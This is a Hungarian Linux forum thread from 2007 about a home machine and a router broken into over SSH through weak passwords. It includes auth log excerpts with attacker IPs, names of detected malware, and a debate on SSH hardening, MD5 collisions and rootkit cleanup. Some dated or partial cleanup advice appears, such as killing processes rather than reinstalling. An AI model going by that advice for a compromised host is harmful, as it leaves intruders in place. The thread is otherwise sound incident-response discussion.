Olyan válaszolós kedvemben vagyok :)

1 gepnek sokaig tarthat a melo, de vajon egy szuperszamitogepnek (=bot halozatnak) is?

Igen, annak is.

Mert amikor napvilagra kerul az a 'nagyon komoly' sec. bug, akkor mar benn is vannak a gepeden (legalabbis safe to assume).

Egy ennyire komoly sebezhetőségnek a valószínűsége az openssh-ban kb epszilon. Szóval ettől még teljesen nyugodtan alszom.

Ma mar a (hagyomanyos) jelszavak nem adnak megfelelo biztonsagot

Itt most botokról beszéltünk, és azok ellen teljesen megfelel a jelszó alapú azonosítás. Persze csak ha az nem "root" vagy "toor", netan "test" :)

Sőt, tovább borzolom a kedélyeket: vannak olyan felhasználók is a gépemen, akiknek nem valami komoly a jelszavuk (rövid, csak kisbetű, szótári szó stb.) Az ilyeneknek rssh a shellje, és csak sftp-zni tudnak egy chrootolt környezetben. Még ebből sem volt semmi gond. A botok még a usernevüket sem találták el :) Szerintem akkor sem lenne nagy gond, ha netán sikerülne belépniük. De azért annak nem örülnék.

Ok, ha Adriara mesz, akkor az IP kiesik, de a kulcs meg lehet pl. pendrive-on. Bar az is megoldhato, hogy van 1 gep, ahova az Adriarol is be tudsz jelentkezni, es onnan (mar fix IP-rol) a levelezo szerverre. Igy a hekkernek 2 gepet kell feltornie, ha be akar menni a mail szerveredre.

Másrészt így a felhasználóknak lesz shell-jük?
ssh = secure shell

Ha a root jelszo valoban nagyon eros, imho nem kell gyakran valtoztatni.

ASK Me No Questions, I'll Tell You No Lies

Akkor is sok a 'ha':

- ha ellenőrzi a tunnelen keresztül elért gép publikus kulcsáról megjelenített ujjlenyomatot (az emberek 90%-a nem teszi ezt meg ;)
- ha megbízik abban, hogy az ujjlenyomat a valódi szerver publikus kulcsáról készült (ugye ez tipikusan egy MD5 hash... gondolom nem kell folytatnom ;)
- ha elfogadja a nagyobb kockázatot, hogy az ssh megvalósításban a man-in-the-middle + post-auth sebezhetőségek kevésbé auditált támadási formák (leginkább csak pre-auth bugokat keresnek, legalábbis a whitehatek ;)
- ha megbízik az ssh _kliens_ implementációban, hogy nincs olyan sebezhetőség benne, amely által lokális hozzáférés szerezhető egy fake sshd segítségével azon a gépen, amelyről a kapcsolatot kezdeményezi (szintén kevésbé auditált ;)

Ezek a rizikófaktorok minimum felmerülnek azon felül, amelyek egyébként is megvannak egy ssh kapcsolat esetén (potencális pre-auth bugok, third-party sebezhetőségek az ssh-n keresztül [PAM, openssl, libz, stb.], ssh független sebezhetőségek... etc. :)

Az SSH csak egy session keyt visz át RSA titkosítással, maga az adatforgamom szimmetrikus kulccsal történik (másként nem tudnád kivárni).

A belépésnél a legfontosabb az, hogy a gépet azonosítsd, amire belépsz. Máskülönben man in the middle áldozata lehetsz. Ehhez a szervered publikus kulcsát kell tudnod (ami pár darab hexa szám szokott lenni). Én pl hordok ilyeneket a tárcámban :-).

Ha a gép amiről belépsz megbízható, akkor a szerver autentikálása után (publikus kulccsal, amit a cetliről szemmel ellenőrzöl) már biztonságos a jelszó begépelése. Ha meg nem megbízható, akkor a kulcsos belépés sem megbízható.

Ergo szerintem a csak kulccsal urban legend, egy kellően hosszú generált jelszó ugyanúgy jó lehet :-).

A szerver publikus kulcsa (vagy annak csak egy lenyomata?) és egy generált jelszó épp ráfér egy névjegykártya hátuljára, persze lopás ellen nem véd...

Azért ha ráteszem egy névjegykártya hátuljára, akkor nyilván csak a kulcsot teszem, a jelszónak pont az az értelme, hogy fejben van, mint ahogy a pinkód. Szerintem az viszont tényleg nagy hiba, ha valaki generáltat egy hosszu jelszót amit a gépen vagy a fene sem tudja hol tárol! EGyébként nem hülyeség az sem, hogy generáltatsz egy jelszót és azt megtanulod.

A jelszó egyébként nem egy rossz megoldás a mai napig, ugyanis ha belegondoltok, a biometrikus cuccokkal ellentétben a fejedben a van, ahonnan ugye még elég nehéz ellopni(egyelőre). Nyilván a legjobb megoldás a kulcs+hosszu jelszó páros!

A gépemet egyébként ujra nyomtam, ráment egy éjszakám( a postgrest még nem telepitettem). Én egyébként nem fogok kulcsokkal szarakodni(csak a known hostra figyelek), ha felháboritó, ha nem. A fent emlitett tüzfalszabályt benyomom és egy megfelelőlen hosszu(kb 15 karakterből álló) biztonsági jelszót használok, aminek egy részét a gép generálja egy része pedig sajat ismeretanyaból van generálva. Ami szerintem a legfontosabb és ebben igazat adok valakinek aki beirta, hogy az AllowUsers opció, ami kizárja a z ilyen eseteket, ugyanis soha nem tudni, hogy milyen progi milyen felhasználónevet generál.

Az AllowUsers-en kívül azért a postgres és hasonló usereket nyugodtan ki lehet tiltani teljesen a loginelésből ("kicsillagozni"), amikor a nevükben indul valami, akkor az úgyis su-val megy. Nincs rá szükség, hogy ilyen néven akár konzolról, akár su-val be lehessen lépni.

Annak is van értelme, ha a su és a sudo (a root belépés letiltása mellett) csak egy csoport (wheel, admins, valami hasonló) tagjainak engedélyezett. így ha sikerül kódot futtatnia pl. postgres néven, akkor sem egy egyszerű jelszókitalálós játék root-tá válnia. (Kell hozzá egy local privilege escalation bug valamiben, ami fut a gépen).

Monsjuk a paranoia tetszőleges szintig folytatható, de szerintem ezek még beleférnek az egészséges elővigyázatosságba.

( szabolcs1975 | 2007. 11. 06., k – 15:53 )

Mondja már meg nekem valaki legyen szives ,miért futtat valaki chat-botot a másik gépén?
Vagy nem is chat-bot valójában?

tényleg nem értem

( _ventura_ v | 2007. 11. 06., k – 16:11 )

annó én is jártam így egyik géppel

bejöttek egy egyszerű userrel aminek a jelszava is egyszerű volt
kb 1234 ;> mivel install után nem lett megváltoztatva
annyit tudott csinálni hogy feltette az ssh brute force scripjét és futtatta, script leállít felhasználó töröl, és kész azóta is megy vígan a masina

viszont érdekes hogy a 1234 szintű jelszóhoz is kellett jó pár hónap mire bejöttek vele :D

Celeron-M 1400Mhz, 768M, Ubuntu 7.10, 2.6.22

( Mr.Big | 2007. 11. 06., k – 16:31 )

Nálam okosabb emberek által írt program ezt mondja:
./romhack/ss Vírus azonosítva Linux/Shark.A
./romhack/sshd Vírus azonosítva Linux/BF.F

mondjuk egyre inkább ugylátodm, hogy itt fogom befejezni a dolgot és tényleg reinstall lesz belőle. Biztam benne, hogy tényleg csak egy elinditott irc-bot és valami brute-force-s progi volt,de igy tényleg esélyt nem látok arra, hogy ebből valaha is normális gép lesz...

nem szabad feladni!

Eloszor is adjal egy ps aux-et

megnezed milyen proceszek futnak a felhasznalo alat
adhatod neki azt is hogy ps aux | grep feltort felhasznalo

A proceszt ami fut legyilkolod
kill -9 pid

megvaltoztatod a jelszot

a /var/tmp -be letorlod a ."" konyvtarat

a ssh biztonsagat megerosited (rengeteg pelda le volt irva) nekem a tippem hogy a default portot atrakod valami magasabb ertekre!!

Utana par napig figyeled a /var/log konyvtarat barmilyen furcsa bejegyzesnek utana nezzel

Sok sikert

Serinted mennyi a ps kimenetében elrejteni valamit...? (A kérdés költői...) nem véletlen, hogy cd-s boot utáni újrarakás, illetve alapos átvizsgálás (aminek az idő/erőforrás igénye jóval több, mint egy install/restore utcsó ismerten jó állapot+hardeningé) volt a ténylegesen használható megoldás. Egy kompromittálódott gépnek azt sem szabad elhinni, ha kérdez pl. a login: root <enter> utáni Password: kérdését sem.

Szori, de nem bírom ki.... :)
Szummáznám a topic lényegét:

TechSupport: Halló, miben segíthetek?
Ügyfél: A számítógépemben füstöl a hálózati tápegység.
TS: Akkor sajnos ki kell cserélnie a tápegységet.
Ü: Nem kell! Csak meg kell változtatni az ini állományokat.
TS: De uram egyértelmű, hogy a tápegység hibás. Ki kell cserélni.
Ü: Semmi esetre. Valaki mondta nekem, hogy elég megváltoztatni az ini állományokat és rendben lesz. Én csak azt akarom öntől, hogy mondja meg a helyes parancsot.
Tíz perc intenzív magyarázat után sem értette meg az ügyfél a probléma lényegét. A TS munkatárs már nem állta meg, hogy ne "feleljen".
TS: Sajnálom uram. Általában ezt az ügyfeleknek nem áruljuk el, de létezik egy nem publikált DOS parancs, amely megoldja ezt a problémát...
Ü: Tudtam én!
TS: A config.sys végére írja be a következő sort: "LOAD NOSMOKE.COM" és minden normálisan fog működni. Utána értesítsen mi a helyzet.

Kb. tíz perc múlva:
Ü: Nem működik. Még mindig füstöl.
TS: Rendben. Milyen verziószámú DOS-t használ?
Ü: MS-DOS 6.22
TS: Akkor ez a probléma. Ez a Dos verzió nem tartalmazza a NOSMOKE.com-t. Kapcsolatba kell lépnie a Microsoft-tal, és kérni tőlük egy upgrade-et. Majd értesítsen, hogy sikerült.

Kb. egy óra múlva.
Ü: Ki kell cserélni a tápegységet.
TS: Miért?
Ü: Hát felhívtam a Microsoftot és a technikusnak elmondtam, hogy ön mit mondott. Utána a tápegységről kérdezgetett...
TS: És mit mondott Önnek?
Ü: Azt mondta, hogy a tápegységem nem kompatilibis a Nosmoke.com-mal.

( -Atis- | 2007. 11. 06., k – 20:03 )

nekem azt mondták, linugzra nincsen vírus
ezért (is) jobb, mint a windows

A vírus csak akkor üt, ha joga van futni, vagy rés van az OS-en. Általában joga van futni... Lévén, hogy a Linuxban nem szokás rootként netezni, kisebb a lehetőség, hogy egy ronda féreg rádmásszon, és a rendszert hazavágja. A Win esetében is működne, ha nem rendszergazdai jogosultsággal futna a civil Winek 99%-a.
--
Coding for fun. ;)

A Win esetében is működne, ha nem rendszergazdai jogosultsággal futna a civil Winek 99%-a.

No, ezért dobtam én nemrég egy "hátast" 1 családnál, ahol 4 gyerek + szülők használják az internetezéshez a PC-t, de a fiókbeállításoknál minden név "mellett" az van, hogy rendszergazda Még az 5 éves és írni még alig-alig tudó (olvasni se jobban) gyermek is rendszergazda... Külön érdekesség, hogy a vendég fiók lehetősége is ott van, de ki volt kapcsolva. Mondván: minek? Nálunk nincs vendég

Ugye, mivel ez egy eXPert Professionale rendszer (név szerint legalább is az), akkor meg azt nem értem, hogy miért nem figyelmeztet, hogy:
Kedves Tudatlan felhasználó!
Kérem őrizze meg az alapbeállításokat és csak mint korlátozott jogú felhasználó internetezzen, mert ezáltal nagyobb biztonságban van a gépe!

Ehelyett, a red$zer a feltelepítés után automatice rendszergazdai jogokkal bíró felhasználókat hoz létre, de a veszélyekre nem figyelmeztet hanem inkább gondosan "elrejti" a számítástechnikát az userek elől :(

Az említett családnál megpróbáltam egy Linux telepítéssel és ment is egy darabig, míglen a "mama" legyalulta és visszarakta az XP-t, merthogy nyomtatni is kell ám...
Így van, de a Brother DCP115C-re a (diver letöltés + telepítés & beállítás után) a CUPS csak annyit tudott "reflektálni", hogy "printer not connected" :(
Pedig a nyomtató csatlakoztatva az USB-re és a 220-ba is, nomeg be is volt kapcsolva......

Hat amit most latunk, hogy a tamado belepett egy trivialis jelszoval.
Letoltott ket programot es futatta.

Semmi olyanra nincs bizonyitek , hogy mas pl. csak root altal irhato/olvashato filehoz, vagy kernelkodhoz hozzafertek volna..

A tobbi mar csak parania. (Vagy tenyleg kovetnek..)

Nehezítés, hogy ha
A) a rendszerét frissítette mostanában, akkor egyáltalán nem biztos, hogy azoknak a checksumoknak egyeznie kell. Az meg már mégiscsak túlzottan munkás lenne, ha most le kellene töltenie az update rpm-eket, kicsomagolnia őket, és a kibontott fájljaiból kellene referencia checksum-ot képeznie
B) ha forrásból is telepített, akkor végképp nincs referencia
C) állítólag még az md5 checksum-ot is lehet "hamisítani", ezért, ha emlékeim nem csalnak, még a fájlméretet is össze kell hasonlítani a teljes azonosság megállapításához.

Vagyis, ha eddig nem tárolta le a referencia checksum/fájlméret értékeket, akkor most már nehezen tudná kibuktatni, hogy melyik rendszerfájlja része egy rootkitnek. Már ha egyáltalán...

---
Mondjon le!

Gondolom, az jó lehet.
Ezt az md5 checksum-os dolgot egyébként évekkel ezelőtt olvastam valahol, nem tudom, nem urban legend-e. Mindenesetre a gyanú árnyéka rávetült, úgyhogy azóta biztonsági célra az md5 checksum-ot önmagában nem használom.
Lehet is benne valami, mert épp mostanság csodálkoztam rá (talán a FreeBSD 6.2-nél?) hogy a csomagok mellett most már az md5 checksum-on kívül egy második checksum is van...

---
Mondjon le!

Jajjistenem hanyszor fog ez meg elojonni?! Lehet utkozo md5-ot gyartani, es nem csak brute force-szal. Amit viszont csak brute force-szal lehet jelenleg az az, hogy egy magvaltoztatott fajlhoz olyan uj bytestreamet fuzzunk hoza, ami az eredeti md5-ot "helyreallitja"

Komolyan ertekelni tudnam ha az ilyen "moszkvaban volvokat osztogatnak" kijelentesek elott legalabb a google-t hasznalna az illeto ahelyett hogy urban legend-eket gyart vagy terjeszt.

Ebben mindkét fájlhoz fűznek hozzá. Tehát nem arról van szó, hogy megváltoztatnak egy programot, hozzáadnak valamit, és az eredeti MD5 áll vissza. Tehát tudsz gyártani két futtatható fájlt, és ebből az egyik lehet kártékony a másik meg jó. Igazán veszélyes az lenne, hogy létrehozol egy tetszőleges fájlhoz egy kártékony fájlt ugyanazzal az md5-tel (és lehetőleg uazzal a mérettel).

Kiegészítésként fűztem hozzá, nem ellentmondásként.
Egyébként teljesen igazad van, viszont már emiatt is elég veszélyt hordoz magában, és kuka kellene legyen az MD5 hashing.
Egyébként van ezen az oldalon még egy vicces dolog: PS3-mal "megjósolták", hogy ki lesz az USA következő elnöke, de "hogy ne manipulálják a választókat a jóslatukkal" csak a jóslat fájljának MD5 hash-ét rakták fel :DDD
Sok szabadidejük lehet:)

Predicting the winner of the 2008 US Presidential Elections using a Sony PlayStation 3

UI.: Mondjuk elfogadnék egy PS3-at szuperszámítógépnek (is)...
____________________________________________________________
Slackware 12/current - linux-2.6.23.9-olorin - KDE 3.5.8

Kerdes mi garantalja, hogy a masik cheksum nem ugyan ugy kicselezheto, en gyanitom, hogy az is kicselezheto, de ketto egyutt mar nehezebb :)

A feladat az, hogy modosits egy binarist, hogy tartalmazza ez utan a te kododat, mukodeseben ne tunjon fel a valtozas (pl. mukodjon :)), es merete se valtozzon.
Ha eddig konyu volt, akkor nehezitesek 1 checksumnak feleljen meg.
Ha meg mindig sima ugy, akkor 2 nek.

Ja a feladatbol kimaradt, hogy kvazi tetszoleges binarrisal tudja ezt megtenni, mert holnap mar lehet mas lesz az aldozatokon..

Mennyire elszantak rootkit keszitok ? :D

( Kayapo | 2007. 11. 06., k – 22:13 )

Feltétlen a chkrootkit -tel ellenőrizd le a gépet, természetesen internet offline http://www.chkrootkit.org/ amit megtalál fertőzött ként cseréld le.
Ezzel együtt ennek a telepítésnek a megtartása öngyilkosság!!! Annak, hogy bejutott, több oka van, több hülyeséget kellett elkövetni, ahhoz, hogy ez összejöjjön. Szerintem újratelepítés nélkül ne hagyd ezt a servert.

( gyuszicco | 2007. 11. 07., sze – 06:07 )

Negyediken az en routerem is elkaptak. Azota nem tudok root-kent belepni. Mivel semmi fontosat nem csinalt az a rendszer csak a netet jatszodta at wlan-rol belso halora, simman legyalulhatom. Na majd hetvegen meg is teszem ... De hasznos ez a topic mert most mar tudom mire kell figyelni. Azert nem gondoltam volna hogy egy ilyen mezei rendszert, nagyon gyenge netkapcsolattal (128 kbps max) is tornek.
Itt a log:

Nov 4 09:49:31 gyuszicco sshd[1210]: Failed password for root from 87.248.164.250 port 55345 ssh2
Nov 4 09:49:36 gyuszicco sshd[1210]: reverse mapping checking getaddrinfo for 87-248-164-250.starnet.md failed - POSSIBLE BREAKIN ATTEMPT!
Nov 4 09:49:38 gyuszicco sshd[1210]: Accepted password for root from 87.248.164.250 port 55345 ssh2
Nov 4 09:55:25 gyuszicco sshd[1228]: Accepted password for root from 86.106.248.197 port 1383 ssh2
Nov 4 09:56:32 gyuszicco in.identd[1260]: reply to 64.157.15.117: 1025 , 6667 : USERID : OTHER :0
--
The worst or stupidest ideas are always the most popular.

Negyediken az en routerem is elkaptak. Azota nem tudok root-kent belepni.

Heh, pl. egy reboottal feltorod a geped.

Mivel semmi fontosat nem csinalt az a rendszer csak a netet jatszodta at wlan-rol belso halora, simman legyalulhatom.

Felejtsetek mar el azt a tezist, hogy csak a gepen orzott homep0rn-ert torik a gepeket. Az esetek 99.9%-ban csak ugrodeszka a kov. rendszerhez. Meg majd faszan lesel, ha bekopog a REBISZ nehany veroemberrel, mert az FBI budapesti kirendeltsegen keresztul azonositottak mint valamelyik kormany rendszer feltoreseert felelos hekkert. Aztan magyarazkodhatsz, hogy nem te voltal.

Na majd hetvegen meg is teszem ... De hasznos ez a topic mert most mar tudom mire kell figyelni.

Pl. Router kivulrol csak ures falat mutat. Lehet nem kene a het vegeig huzni a dolgot.

---
pontscho / fresh!mindworkz

Nehez rebootal feltorni a gepet mert a padlason van, egy gerendan ahova csak nappal lehet felmenni es egyaltalan lehozni. Nincs monitor sem cdrom. Mivel a heten csak este 9 utan erek haza de akkor is kell a net, igy marad. Nagy hasznat szerintem nem veszik hetvegeig mert mint mondtam, nagyon lassu az internetkapcsolata. Az alabbi live cd-s read only-s megoldas jo otlet :) Es tenyleg nem kivanom senkinek hogy legyen Accepted az ssh-ja :). Amugy meg az ok egyszeru. Root belepes sshn engedelyezve es konnyu jelszo. Szoval egyertelmuen user hiba (vagyis az enyem)
--
The worst or stupidest ideas are always the most popular.

Mivel semmi fontosat nem csinalt az a rendszer csak a netet jatszodta at wlan-rol belso halora, ...

Sorry, ha botor a kérdés, de nem lehet "e funkciót" 1 Live CD-vel megoldani, úgy, hogy egy floppyra (vagy Pen Drive-ra), menti az ember a beállításokat amelyeket azután írásvédettre állít át?

Egy ilyen rendszert próbáljon meg valaki feltörni.

(alkalmaznak hasonlót tudtommal)

1. Gibraltár (de lehet, hogy már csak fizetős).
ezt keresd: gibraltar-2.2a.iso.bz2

2. nézz köröl a szabilinux.hu-n
úgy emlékszem, mintha ott olvastam volna (magyarul),
hogyan kell cd-re átszerelni a belőtt tűzfalunkat.

3. Felhasználói módban futtatod a linuxban a tűzfalat (egy linux alatt).
illetve a belőtt tűzfal másolatát (linuxvilág.hu - amíg megvan)
ha gáz van, a COW törlése, új másolat ebben kísérletezhetsz,
ha szerinted most jó, akkor ennek változatnak a másolata lesz a működő tűzfal.
vagy a postresql fehéregér

BigRoot - SKAS-patch
egyebet nem tudok mondani.

( szabolcs1975 | 2007. 11. 07., sze – 11:37 )

Egyébként tényleg jó lenne egy olyan eszköz(virtuális gép) ami az elinditott alkalmazás fájlmüveleteit figyeli.

Egyébként ami nálam történt, csakhogy tudjátok. Tehát itt nem szerverről van szó, hanem egy otthoni dekstop gépről, amit voltaképpen programozásra használok. Az egyik este feltettem a postgrest és ugye irogattam a DB backendet használó progimat. Másnap megyek haza és az albérlőtársam szól, hogy nincs net. Mondom fasza a szolgáltató már megint szarakodik, de mondom azért belépek a router configjába(ez egy egyszerü mezei kis router, már ha lehet annak nevezni, talán a gateway jobb szó rá).

Beakarok lépni és rohadt lassan jön be az admin felület. Várok várok, nagy nehezen bejön. Hmmm mondom, fasza. Akkor még azt hittem a router rossz. Aztán amikor ujracsatlakoztam, szépen ment a dolog kb 2 percit, utánna megint lelassult minden(mondom még a router kezelőfelületét is alig tudtam elérni, a ping idők másodperc körüliek voltak a haverom gépe és az én gépem között). A haveromnak Win-je van, szóltam neki, hogy huzza ki a gépét mert valoszinü valami kéretlen alkalmazás használja a hálót. Kihuzzza és hopp, rendesen megy a dolog, kb 10s-ig, utánna megint minden lassu. Na mondom ennek már a fele sem tréfa, a linux lesz a bünös, igy is lett. Körülnéztem de semmi betörési jel. Végignéztem a historykat és látom, hogy olyan parancsokat kapott szerencsétlen gép, amiket én soha nem adtam neki...de akkor ki? Igen ő volt a Román hacker barátunk, ami ugye első körben "ártatlan" jelszótörő és egy IRC-bot programnak látszott. Aztán később kiderült, hogy bizony van ott két darab virus is, ami azért engem is meglepett(httpd, sshd), ami ugye egy álca.

ui: azt nem tudom, hogy pontosan mi lehetett az ami ilyen mértékü torlodást okozott, hátha ti okosabbak vagytok ez ügyben...én passszolom. Egy biztos sima adatforgalommal igy nem tudsz hazavágni egy hálót, legalábbis nekem ez még nem sikerült....

Szia!

Szerintem (volt hasonló problémám) a legjobb, ha csinálsz 1 másik telepítés, de csak azért, hogy leszedd onnan a "tiszta" binárisokat. Majd egy másik gépbe beraknám a hdd-t (régit) és ott futtatnék 1 víruskeresést, ami megmutatja, hogy melyik a fertőzött (persze amit leget azt törölném). Egy egyszerű másolás (ja de előbb az ssh-t és a postrgesql-t állíts be biztonságosabban).

( pepo v | 2007. 11. 15., cs – 17:03 )

Reggel csörgött a telcsi a tárhelyszolgáltatótól: "Kicsit sokat fogyasztja a netet a géped. 3 órája 100 Mbitet másodpercenként."

Ezt találtam az auth.log-ban: 

Nov 15 06:25:02 szerver_x su[13789]: Successful su for nobody by root
Nov 15 06:25:02 szerver_x su[13789]: + ??? root:nobody
Nov 15 06:25:02 szerver_x su[13789]: (pam_unix) session opened for user nobody by (uid=0)
Nov 15 06:25:02 szerver_x su[13789]: (pam_unix) session closed for user nobody
Nov 15 06:25:02 szerver_x su[13793]: Successful su for nobody by root
Nov 15 06:25:02 szerver_x su[13793]: + ??? root:nobody
Nov 15 06:25:02 szerver_x su[13793]: (pam_unix) session opened for user nobody by (uid=0)
Nov 15 06:25:02 szerver_x su[13793]: (pam_unix) session closed for user nobody
Nov 15 06:25:02 szerver_x su[13795]: Successful su for nobody by root
Nov 15 06:25:02 szerver_x su[13795]: + ??? root:nobody
Nov 15 06:25:02 szerver_x su[13795]: (pam_unix) session opened for user nobody by (uid=0)
Nov 15 06:25:30 szerver_x su[13795]: (pam_unix) session closed for user nobody

Mi lehet ez? (Ja, a sávszéfogyasztást egy sshd restart oldotta meg.) Erős a gyanúm, hogy bekukkantott valaki, és marha jól söpört maga után... (Mert a többi logban semmi nem látszik.)
Vélemény?

grep nobody passwd
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
grep nobody shadow
nobody:*:13310:0:99999:7::
groups nobody
nobody : nogroup

cat pam.d/su | grep -v "\#"

auth sufficient pam_rootok.so
session required pam_env.so readenv=1
session required pam_env.so readenv=1 envfile=/etc/default/locale
session optional pam_mail.so nopen
@include common-auth
@include common-account
@include common-session

ps ax -F | grep nobody
root 5570 5755 0 410 512 0 21:16 pts/4 S+ 0:00 grep nobody

auth required pam_wheel.so use_uid # erdemes elgondolkozni rajta

Az mire jó?

Valamilyen idokoznkent se fut neked semmi nobody -kent ?

Nem tudok róla.

/bin/sh -->/bin/false

Ezzel megpróbálkozhatok... Átírtam. Ha nem lesz gond, akkor tőlem maradhat is.

Mindenkinek köszönöm.

Igen láttam a futtathatósági ellenőrzést és a vagylagos indítást.

Uhum, egyre inkább úgy néz ki, hogy ez nem betörés, hanem valami bagzás lehetett inkább.
A jelzett netterhelés ideje alatt többször figyeltem, hogy milyen csatlakozások élők, de SENKIT nem láttam magamon kívül. A netstat-ról később kiderült, hogy "tiszta". Ezen a gépen semmi más nem futott a net felé csak az sshd és egy FPS játék kiszolgáló.
Ez a gép egy VPS. Elképzelhetőnek tartom, hogy ez egy VPS hiba lehetett. Találkozott már valaki ilyesmivel? Itt egy képrnyőkép a netterhelésről...

( Morin | 2007. 11. 16., p – 09:51 )

Hali!

Valami 2ip.com-os ingyenes webtárhelyszolgáltatóhoz tette fel a cuccot az illető ('hax0r')... lehet szólni kéne 2ip.com-éknak, hogy szedjék le a cuccot. Ezt pl. megtehetné a 'sértett'.